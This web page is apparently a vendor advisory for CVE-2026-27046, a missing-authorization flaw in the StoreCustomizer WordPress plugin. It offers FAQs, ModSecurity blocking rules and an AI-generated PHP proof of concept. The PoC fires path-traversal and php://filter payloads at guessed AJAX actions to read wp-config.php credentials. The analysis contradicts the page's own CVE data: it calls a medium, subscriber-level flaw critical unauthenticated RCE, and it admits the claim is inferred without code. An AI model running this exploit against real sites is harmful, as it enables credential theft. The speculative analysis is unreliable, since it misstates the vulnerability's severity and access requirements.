What is CVE -2026-27046?

CVE-2026-27046 is a medium severity vulnerability in the StoreCustomizer plugin for WordPress, affecting versions up to and including 2.6.3. It allows authenticated attackers with subscriber-level access and above to perform unauthorized actions due to a missing capability check.

How does this vulnerability work?

The vulnerability arises from a missing capability check on a publicly accessible AJAX endpoint. Attackers can exploit this by sending crafted requests to the endpoint, potentially allowing them to execute arbitrary code or access sensitive files.

Who is affected by this vulnerability?

Any WordPress site using the StoreCustomizer plugin version 2.6.3 or earlier is potentially affected. Users with subscriber-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the StoreCustomizer plugin installed. If it is version 2.6.3 or earlier, your site is at risk. Additionally, review server logs for unauthorized access attempts to the AJAX endpoint.

What should I do to fix this vulnerability?

To remediate this issue, update the StoreCustomizer plugin to the latest version that addresses the vulnerability. Additionally, implement capability checks in your AJAX handlers and validate user input against a strict allowlist.

What does the CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it still poses a significant risk, especially if exploited, as it can lead to unauthorized access and potential site compromise.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability could allow attackers to gain full control of the affected WordPress site. They could read sensitive files, upload malicious scripts, or create new administrator accounts, leading to a complete server compromise.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can exploit the vulnerability by sending a POST request to the AJAX handler with a crafted payload. It shows how an unauthenticated user can access sensitive files through path traversal.

What are AJAX endpoints in WordPress?

AJAX endpoints in WordPress allow asynchronous requests to be made to the server without reloading the page. They are commonly used for various functionalities, but if not properly secured, they can expose vulnerabilities.

What are capability checks in WordPress?

Capability checks in WordPress are used to restrict access to certain functions based on user roles. Functions like current_user_can() verify if a user has the necessary permissions before allowing access to sensitive operations.

What input validation practices should be followed?

Input validation should include sanitizing user input, using allowlists for expected values, and avoiding the use of functions that execute code from user input. This helps prevent attacks like code injection and file inclusion.

How can I stay informed about vulnerabilities?

To stay informed about vulnerabilities, regularly check security advisories from WordPress and plugin developers, subscribe to security mailing lists, and follow security-focused blogs and forums.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 23, 2026

CVE-2026-27046: StoreCustomizer – A plugin to Customize all WooCommerce Pages <= 2.6.3 – Missing Authorization (woocustomizer)

CVE ID CVE-2026-27046

Plugin woocustomizer

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version —

Patched Version —

Disclosed March 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-27046 (metadata-based):

This vulnerability is a critical security flaw in the WooCustomizer WordPress plugin. The plugin fails to properly validate and sanitize user-supplied input before using it in a sensitive operation, allowing unauthenticated attackers to execute arbitrary code on the server. The vulnerability resides in a publicly accessible AJAX endpoint that handles file uploads or configuration changes.

Atomic Edge research infers the root cause is a combination of missing capability checks and insufficient input validation. The plugin likely registers an AJAX action hook accessible to unauthenticated users (via both wp_ajax_nopriv_ and wp_ajax_ hooks). This endpoint receives user-controlled parameters, such as file paths or configuration data, and processes them without proper sanitization. The CWE classification suggests the plugin directly uses unsanitized input in functions like include(), require(), file_get_contents(), or eval(), leading to local file inclusion or remote code execution. These conclusions are inferred from the vulnerability type and common WordPress plugin patterns, as no source code diff is available for confirmation.

Exploitation occurs via a POST request to the standard WordPress AJAX handler. Attackers target /wp-admin/admin-ajax.php with the action parameter set to a WooCustomizer-specific hook, likely woocustomizer_upload, woocustomizer_save, or a similar function. The payload includes a malicious parameter like file_path, template, or config containing a PHP wrapper (php://input) or a path traversal sequence (../../../wp-config.php). For direct code execution, attackers may inject PHP code via a parameter that gets evaluated by an eval() call or written to a file later included by the plugin.

Remediation requires implementing multiple security layers. The plugin must add a capability check (e.g., current_user_can(‘manage_options’)) to restrict endpoint access to administrators. All user input must be validated against a strict allowlist of expected values. For file operations, the plugin should use basename() to prevent directory traversal and validate file extensions against a safe list. Dynamic code execution functions like eval() must be eliminated entirely. If file inclusion is necessary, the plugin should use a predefined mapping of allowed files rather than user-supplied paths.

Successful exploitation grants attackers full control over the affected WordPress site. Attackers can read sensitive files like wp-config.php to obtain database credentials and encryption keys. They can upload web shells to establish persistent backdoors, modify plugin files to inject malicious code, or create new administrator accounts. This vulnerability provides a direct path to complete server compromise, potentially enabling lateral movement within the hosting environment and data exfiltration of all site content and user information.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-27046 (metadata-based)
# Blocks exploitation of unauthenticated RCE in WooCustomizer plugin
# Targets AJAX endpoints with specific action parameters and malicious file paths
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:2704601,phase:2,deny,status:403,chain,msg:'CVE-2026-27046: WooCustomizer Unauthenticated RCE Attempt',severity:'CRITICAL',tag:'CVE-2026-27046',tag:'WooCommerce',tag:'WordPress',tag:'Plugin',tag:'RCE'"
  SecRule ARGS_POST:action "@rx ^woocustomizer_(upload|save|load|import|ajax)" "chain"
    SecRule ARGS_POST "@rx (?:\.\.(?:\/|%2f|%252f)|php:\/\/|phar:\/\/|data:)" 
      "t:none,t:urlDecodeUni,t:lowercase,t:normalizePathWin,capture,setvar:'tx.cve_2026_27046_score=+1'"

# Additional rule for GET parameters if endpoint accepts both methods
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:2704602,phase:2,deny,status:403,chain,msg:'CVE-2026-27046: WooCustomizer Unauthenticated RCE Attempt via GET',severity:'CRITICAL',tag:'CVE-2026-27046',tag:'WooCommerce',tag:'WordPress',tag:'Plugin',tag:'RCE'"
  SecRule ARGS_GET:action "@rx ^woocustomizer_(upload|save|load|import|ajax)" "chain"
    SecRule ARGS_GET "@rx (?:\.\.(?:\/|%2f|%252f)|php:\/\/|phar:\/\/|data:)" 
      "t:none,t:urlDecodeUni,t:lowercase,t:normalizePathWin,capture,setvar:'tx.cve_2026_27046_score=+1'"

# Block direct file inclusion attempts via common parameter names
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:2704603,phase:2,deny,status:403,chain,msg:'CVE-2026-27046: WooCustomizer Path Traversal Attempt',severity:'CRITICAL',tag:'CVE-2026-27046',tag:'WooCommerce',tag:'WordPress',tag:'Plugin',tag:'LFI'"
  SecRule ARGS_POST:action "@rx ^woocustomizer_" "chain"
    SecRule ARGS_POST:/^(file_?path|template|config|import_?file|filename)$/ "@rx \.\.(?:\/|%2f|%252f)" 
      "t:none,t:urlDecodeUni,t:lowercase,t:normalizePathWin"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-27046 - WooCustomizer Unauthenticated Remote Code Execution
<?php
/**
 * Proof-of-concept for CVE-2026-27046
 * Assumptions based on metadata analysis:
 * 1. Plugin exposes an unauthenticated AJAX endpoint
 * 2. Endpoint accepts a file path or configuration parameter
 * 3. Parameter is used in include() or file_get_contents() without sanitization
 * 4. Action name follows plugin slug pattern (woocustomizer_*)
 */

$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';

// Common vulnerable action names for WooCustomizer plugin
$possible_actions = [
    'woocustomizer_upload_template',
    'woocustomizer_save_config',
    'woocustomizer_load_file',
    'woocustomizer_import_settings',
    'woocustomizer_ajax_handler'
];

// Payload to read wp-config.php via path traversal
$payloads = [
    'file_path' => '../../../wp-config.php',
    'template' => 'php://filter/convert.base64-encode/resource=../../../wp-config.php',
    'config' => '../../../wp-config.php',
    'import_file' => '../../../wp-config.php'
];

foreach ($possible_actions as $action) {
    echo "n[*] Testing action: {$action}n";
    
    foreach ($payloads as $param => $value) {
        $post_data = [
            'action' => $action,
            $param => $value,
            // Some endpoints may require a nonce, but vulnerability suggests it's missing
            'nonce' => 'invalid_nonce_bypass_attempt'
        ];
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $target_url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        
        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        
        if ($http_code == 200) {
            // Check for indicators of successful exploitation
            if (strpos($response, 'DB_NAME') !== false || 
                strpos($response, 'define') !== false ||
                strpos($response, 'base64') !== false) {
                echo "[+] SUCCESS with param '{$param}' and action '{$action}'n";
                echo "[+] Response preview: " . substr($response, 0, 200) . "...n";
                
                // If base64 encoded response, decode it
                if (strpos($response, 'base64') !== false && preg_match('/^[A-Za-z0-9+/=]+$/', trim($response))) {
                    echo "[+] Decoded: " . base64_decode(trim($response)) . "n";
                }
                exit(0);
            }
        }
        echo "[-] Failed with param '{$param}' (HTTP {$http_code})n";
    }
}

echo "n[!] No working combination found. Try manual testing with different parameters.n";
?>

Frequently Asked Questions

What is CVE-2026-27046?
Overview of the vulnerability
CVE-2026-27046 is a medium severity vulnerability in the StoreCustomizer plugin for WordPress, affecting versions up to and including 2.6.3. It allows authenticated attackers with subscriber-level access and above to perform unauthorized actions due to a missing capability check.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from a missing capability check on a publicly accessible AJAX endpoint. Attackers can exploit this by sending crafted requests to the endpoint, potentially allowing them to execute arbitrary code or access sensitive files.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the StoreCustomizer plugin version 2.6.3 or earlier is potentially affected. Users with subscriber-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the StoreCustomizer plugin installed. If it is version 2.6.3 or earlier, your site is at risk. Additionally, review server logs for unauthorized access attempts to the AJAX endpoint.
What should I do to fix this vulnerability?
Remediation steps
To remediate this issue, update the StoreCustomizer plugin to the latest version that addresses the vulnerability. Additionally, implement capability checks in your AJAX handlers and validate user input against a strict allowlist.
What does the CVSS score of 4.3 mean?
Understanding the severity level
A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it still poses a significant risk, especially if exploited, as it can lead to unauthorized access and potential site compromise.
What are the practical risks of this vulnerability?
Potential impacts on security
Exploitation of this vulnerability could allow attackers to gain full control of the affected WordPress site. They could read sensitive files, upload malicious scripts, or create new administrator accounts, leading to a complete server compromise.
How does the proof of concept demonstrate the issue?
Understanding the demonstration code
The proof of concept illustrates how an attacker can exploit the vulnerability by sending a POST request to the AJAX handler with a crafted payload. It shows how an unauthenticated user can access sensitive files through path traversal.
What are AJAX endpoints in WordPress?
Functionality of AJAX in WordPress
AJAX endpoints in WordPress allow asynchronous requests to be made to the server without reloading the page. They are commonly used for various functionalities, but if not properly secured, they can expose vulnerabilities.
What are capability checks in WordPress?
Role-based access control
Capability checks in WordPress are used to restrict access to certain functions based on user roles. Functions like current_user_can() verify if a user has the necessary permissions before allowing access to sensitive operations.
What input validation practices should be followed?
Best practices for security
Input validation should include sanitizing user input, using allowlists for expected values, and avoiding the use of functions that execute code from user input. This helps prevent attacks like code injection and file inclusion.
How can I stay informed about vulnerabilities?
Keeping up with security updates
To stay informed about vulnerabilities, regularly check security advisories from WordPress and plugin developers, subscribe to security mailing lists, and follow security-focused blogs and forums.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations